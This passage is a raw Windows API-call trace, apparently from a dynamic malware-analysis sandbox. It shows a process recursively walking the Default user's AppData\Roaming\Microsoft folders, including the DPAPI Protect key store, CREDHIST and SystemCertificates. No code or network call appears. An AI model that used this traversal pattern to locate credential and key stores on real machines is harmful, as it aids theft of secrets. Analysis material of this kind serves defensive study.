	[0102.330] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.330] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.330] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0
	[0102.330] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.330] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1
	[0102.330] lstrcmpiW (lpString1="Internet Explorer", lpString2=".") returned 1
	[0102.330] lstrcmpiW (lpString1="Internet Explorer", lpString2="..") returned 1
	[0102.330] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Internet Explorer\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.330] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.330] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.331] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1
	[0102.331] lstrcmpiW (lpString1="Quick Launch", lpString2=".") returned 1
	[0102.331] lstrcmpiW (lpString1="Quick Launch", lpString2="..") returned 1
	[0102.331] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Internet Explorer\\\\Quick Launch\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.332] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.332] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.332] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.332] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.332] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd36f7c8c, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd376a0ad, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.332] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd36d1b2c, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd36d1b2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1
	[0102.332] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1
	[0102.332] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd371ddec, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1
	[0102.332] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd371ddec, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd3743f4d, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0
	[0102.332] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.333] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0
	[0102.333] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.333] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1
	[0102.333] lstrcmpiW (lpString1="Protect", lpString2=".") returned 1
	[0102.334] lstrcmpiW (lpString1="Protect", lpString2="..") returned 1
	[0102.334] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Protect\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.334] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.334] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.334] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.334] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.334] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82615b0a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1
	[0102.334] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 1
	[0102.334] lstrcmpiW (lpString1="S-1-5-21-892523515-1518344882-2423736544-500", lpString2=".") returned 1
	[0102.334] lstrcmpiW (lpString1="S-1-5-21-892523515-1518344882-2423736544-500", lpString2="..") returned 1
	[0102.334] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Protect\\\\S-1-5-21-892523515-1518344882-2423736544-500\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.336] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.336] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.336] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.336] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.336] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8276c76d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="16d9487c-eb21-48f6-b767-53160cf7974d", cAlternateFileName="16D948~1")) returned 1
	[0102.336] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1
	[0102.336] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0
	[0102.336] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.337] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 0
	[0102.337] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.337] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1
	[0102.337] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1
	[0102.337] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1
	[0102.337] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.338] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.338] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.338] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.338] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.338] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1
	[0102.338] lstrcmpiW (lpString1="My", lpString2=".") returned 1
	[0102.338] lstrcmpiW (lpString1="My", lpString2="..") returned 1
	[0102.338] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.338] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.338] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.339] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.339] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.339] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1
	[0102.339] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1
	[0102.339] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1
	[0102.339] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\Certificates\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.339] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.339] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.339] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.339] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.339] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.339] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.339] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1
	[0102.339] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1
	[0102.339] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1
	[0102.339] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.340] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.340] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.340] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.340] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.340] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.340] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.340] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1
	[0102.340] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1
	[0102.340] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1
